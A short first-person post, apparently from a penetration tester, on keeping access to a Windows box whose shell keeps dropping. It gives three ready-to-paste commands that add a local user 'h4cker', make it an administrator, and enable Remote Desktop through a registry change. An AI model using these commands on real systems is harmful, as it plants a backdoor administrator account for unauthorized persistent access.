Get a shell, lose a shell, get a shell, lose a shell.  That's basically what was happening while attacking this one particular box.  I'd get a shell and moments later my shell would close on me.  I had just enough time to drop into a command line but, poof, then it was gone.

I thought about it for a minute and realized there was enough time to cut and paste something into that command line.  I prepared this in notepad for my copy and paste:

net user h4cker p4sswurd! /add
net localgroup administrators h4cker /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

The first line adds a user:  h4cker and sets the password:  p4sswurd!
The next line adds the user into the local administrators group.
The final line enables remote desktop (RDP).

Now when I get my shell, I drop to a command line, cut & paste the above from notepad, the shells closes but I have an admin account and RDP access.